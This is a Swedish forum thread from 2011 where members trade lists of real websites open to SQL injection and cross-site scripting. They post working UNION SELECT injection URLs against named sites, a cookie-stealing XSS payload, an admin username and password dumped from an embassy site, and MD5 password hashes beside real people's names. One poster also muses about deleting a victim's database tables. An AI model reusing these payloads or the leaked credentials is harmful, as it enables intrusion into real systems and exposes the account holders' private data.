1. Dator och IT
  2. IT-säkerhet

Samling av sidor med säkerhetsbrister - Del 2

Svara
2011-02-23, 22:37
  #2233
vicious
Medlem
Citat:
Ursprungligen postat av Gh0sted
http://www.bayareaassn.com/memberinfo.php?id=10
admin:a11enn0w

Får 302 av varenda sida med adminscanner så ger någon annan chansen.


http://www.bayareaassn.com/controlpanel

funkar inte att logga in med "admin:a11enn0w"
Citera
2011-02-23, 22:58
  #2234
fooztr
Medlem
fooztrs avatar
Enjoy
Kod: 
http://190.95.203.220/phpMyAdmin/scripts/setup.php

XSS
Kod: 
http://www.sas.com/apps/demosdownloads/setupcat.jsp?cat=++++%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
__________________
Senast redigerad av fooztr 2011-02-23 kl. 23:03.
Citera
2011-02-24, 12:27
  #2235
ScamHunter
Bannlyst
http://afpt.se/?page=258
Citera
2011-02-24, 15:13
  #2236
Gh0sted
Medlem
Gh0steds avatar
Någon som gett sig på Frida.se än? (igen)
Själv är jag inte nå vidare på PostgreSQL..
Citera
2011-02-24, 20:08
  #2237
Gh0sted
Medlem
Gh0steds avatar
Kod: 
http://www.finnhamn.se/index.php?id=20'
http://www.stigatabletennis.se/pro_objects_details.php?id=16'
http://www.krusell.se/product.php?id=98productid=3712b=m='
http://drzipe.se/googles.php?id=2'
http://nic.hb.se/index.php?id=12'
http://sebastian-andersson.se/forums/profile.php?id=81914'
http://www.solarregion.se/index.php?id=168'
http://tepg.se/showtitle.php?id=230'
http://www.tepg.se/showtitle.php?id=324'
http://swmafrontend.qbank.se/preview.php?id=387'
http://www.melbourneitdbs.se/events.php?id=13'
http://www.tropicarium.se/index.php?id=69'&ChangeLang=en'&lang=en'
http://snigeldesign.se/index.php?id=155'&frompage='
http://d20578849.u301.surftown.se/index.php?id=60'
http://www.checkdent.se/sv.php?id=12308088982192078'
http://stigatabletennis.se/news_details.php?id=92'
http://www.stigatabletennis.se/news_details.php?id=22'
http://www.adcomlive.se/profile.php?id=632088'
http://www.busybeemfk.se/forum/view_topic.php?id=22'
http://www.agentbolaget.se/artist.php?id=pergraffman'
http://www.discsport.se/shopping/index.php?id=810'
http://www.k9.se/viewOther.php?id=269'
http://www.nordicagolf.se/ad.php?id=152'
http://www.advbyra.se/lawyer.php?id=1'
http://modulsyd.se/index.php?module=Web_Links'&func=randomlink'
http://www.stigagames.se/retailers.php?id=191'
http://www.krischan.se/index.php?id=603'
http://www.chainsawcollectors.se/phpbb3/viewtopic.php?f=79'&t=8213'
http://swmafrontend.qbank.se/category.php?id=74'
http://ezee.se/funnies/show_funny.php?id=p88'&sec=1'
http://www.svenskabrollopsbilder.se/gslide/cms/index.php?id=2'
http://www.mobelriket.se/index.php?id=174'
http://www.equalfair.se/begood/file_db.php?id=102'
http://www.karkatt.se/plogger/plog-rss.php?level=album'&id=3'
http://www.ewp.se/inrapportering2/map.php?lan=11'&tidskala=24'&tid=yes'
http://www.svinstia.se/ljudarkiv/soundplayer.php?id=40'
http://www.tolle.se/sidxpage.php?id=962'&typ=sida'
http://forum.openids.se/profile.php?id=2070'
http://checkdent.se/sv.php?id=12308088997146912'
http://www.proview.se/index.php?option=com_joomlaboard'&Itemid=24'&func=view'&catid=3'&id=1377'
http://wiki.tada.se/index.php?title=Help:Magic_words'
http://www.indianembassy.se/events_details.php?id=1'
http://www.finest.se/userBlog/index.php?uid=38844'&viewComments1617784=1'&beid=1510044'
http://www.sos-stockholm.se/gallery/viewphoto.php?id=13978'
Citera
2011-02-24, 21:38
  #2238
vicious
Medlem
Citat:
Ursprungligen postat av Gh0sted
Kod: 
**
http://www.indianembassy.se/events_details.php?id=1'
**

Kod: 
http://www.indianembassy.se/events_details.php?id=-1%20union%20all%20select%201,concat(admin_name,0x3a,admin_password),3,4,5,6,7  ,8%20from%20admin--

admin: embessay
pass: sweden!@#
Citera
2011-02-24, 23:31
  #2239
vicious
Medlem
Citat:
Ursprungligen postat av Gh0sted
Kod: 
http://www.stigagames.se/retailers.php?id=191'

Kod: 
http://www.stigagames.se/retailers.php?id=-191%20union%20all%20select%201,2,3,4,convert(table_name%20using%20latin1),6,7,8,9,  10,11%20from%20information_schema.tables--
http://www.stigagames.se/retailers.php?id=-191%20union%20all%20select%201,2,3,4,convert(column_name%20using%20latin1),6,7,8,9  ,10,11%20from%20information_schema.columns--

...tycker jag hittar rätt tabell och kolumner men injektion funkar inte någon som kan detta bättre får gärna upplysa mig..?

tabellen jag trodde va rätt: STIGA_USERS
kolumner som är intressanta: SPELARE, LOSEN, EMAIL
Citera
2011-02-25, 00:21
  #2240
vicious
Medlem
Kod: 
http://www.bigdance2010.com/news.php?id=-56%20union%20all%20select%201,group_concat(table_name),3,4,5,6,7%20from%20information_s  chema.tables%20where%20table_schema=database()--
http://www.bigdance2010.com/news.php?id=-56%20union%20all%20select%201,group_concat(column_name),3,4,5,6,7%20from%20information_  schema.columns%20where%20table_schema=database()--
http://dombeya.sanparks.org/parks/bontebok/news.php?id='
http://www.niobrarahospital.com/news.php?mode=news&id='
http://www.lancs.ac.uk/microsoftcentre/news/news.php?id='
__________________
Senast redigerad av vicious 2011-02-25 kl. 00:32. Anledning: länk
Citera
2011-02-25, 04:41
  #2241
TheDetektiv
Medlem
http://drzipe.se/

Hejsan, är faktiskt helt ny med detta.. Jag gjorde detta i utbildningssyfte då ^^

Här har ni sidan :
Kod: 
http://drzipe.se/googles.php?id=-2 UNION SELECT 1,2,3,4,5,group_concat(title),7,8,9,10,11,12,13,14,15,16,17,18,19 from drzipe.table_dirtgearpages--

Synd att det inte var sån "Login" sida.. Då kunde man haffat åt sig usernames & passwords
Börjar lära mig lite grann hihi

Stackars DrZipe.. Man kan väl "förstöra" hela hans sida genom att "deleta" hans tabeller & hela köret? :P

Han borde ha sin hemsida mer säkrare om han inte vill att den ska bli "hackad" ^^
( Speciellt av en amatör, har läst lite om det nu osv testat mig fram börjat fatta en del )


Tabeller
Kod: 
table_dirtgearpages


	Kod:
	
id
title
startimage
text_1
head_2
text_2
img_1
img_1_text
img_1_url
img_1_url_target
img_2
img_2_text
img_2_url
img_2_url_target
img_3
img_3_text
img_3_url
img_3_url_target
imgFolder




table_gearpages


	Kod:
	
id
title
geartype
startimage
text_1
head_2
text_2
img_1
img_1_text
img_1_url
img_1_url_target
img_2
img_2_text
img_2_url
img_2_url_target
img_3
img_3_text
img_3_url
img_3_url_target
imgFolder




table_googlepages


	Kod:
	
id
title
startimage
text_1
head_2
text_2
img_1
img_1_text
img_1_url
img_1_url_target
img_2
img_2_text
img_2_url
img_2_url_target
img_3
img_3_text
img_3_url
img_3_url_target
imgFolder




tbl_dirtgear


	Kod:
	
id
motherpage
small_img
articlenr
frame
lens
strap
headbolt
isActive




tbl_dirtgearmenu


	Kod:
	
id
articleName
category
dirtgearpageId
sortOrder




tbl_distributors


	Kod:
	
id
market_name
adressrow_1
adressrow_2
adressrow_3
adressrow_4
adressrow_5
fax
tel
www
email




tbl_gear


	Kod:
	
id
motherpage
small_img
articlenr
color
lens
size
frame
extraInfo
isActive




tbl_gearmenu


	Kod:
	
id
articleName
category
gearpageId
sortOrder




tbl_gogglemenu


	Kod:
	
id
articleName
category
gogglepageId
sortOrder




tbl_googles


	Kod:
	
id
motherpage
small_img
articlenr
frame
lens
strap
headbolt
isActive




tbl_inst_events


	Kod:
	
id
head
text
eventd........




( PS, sidan var för stor kunde inte "få" ut all info ( Är nybörjare med ^^ )
tbl_inst_friends
tbl_inst_links
tbl_inst_youtube
tbl_journals
tbl_patients

Bedömm gärna från 1^-> 10 .. Fast ni får vara lite schysta nu va Började i natt (A)
Är helt lärvillig till att utvecka mig i detta, någon som kan mycket ?
Citera
2011-02-25, 08:33
  #2242
TurnOn
Medlem
TurnOns avatar
http://www.skrattnet.se/kategorier/index.php?cat=4
Citera
2011-02-25, 09:26
  #2243
Tre100
Medlem
Tre100s avatar
Citat:
Ursprungligen postat av TurnOn
http://www.skrattnet.se/kategorier/index.php?cat=4
098f6bcd4621d373cade4e832627b4f6 dennis Gustafsson Dennis test
2dfc1324783b3ba63ddfd9421633d0a4 adam Evertsson Adam
55f08ef651c5f3c75f984ee0a2b8be49 erik Pavletic Erik lilylily
69e1f84fe360ed63d7c11f9906ca8107 nyniklas Nordlund Jr. Niklas
f5bfd2a5023a8673eb348ec1209b4f21 jimmy Nordlund Jimmy
ff0c9b2c31f75791dbeee73f7c6531bb niklas Nordlund Niklas
Citera
2011-02-25, 12:54
  #2244
Gh0sted
Medlem
Gh0steds avatar
Citat:
Ursprungligen postat av TheDetektiv
Ej slutfört

Slutför det så får du en rättvis bedömning.


Någon av er som testat att enbart scanna efter .se domäner? Fan vilken skillnad man märker.
Kan ha vart en slump, men för det första så klarade Havij av utan problem att plocka fram allt i 8/10 fall, dessutom upplevde jag dessa .se domäner som bra mycket snabbare än servrar ifrån andra länder.
Kass säkerhet, underbar responstid..
__________________
Senast redigerad av Gh0sted 2011-02-25 kl. 12:59.
Citera
Svara

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in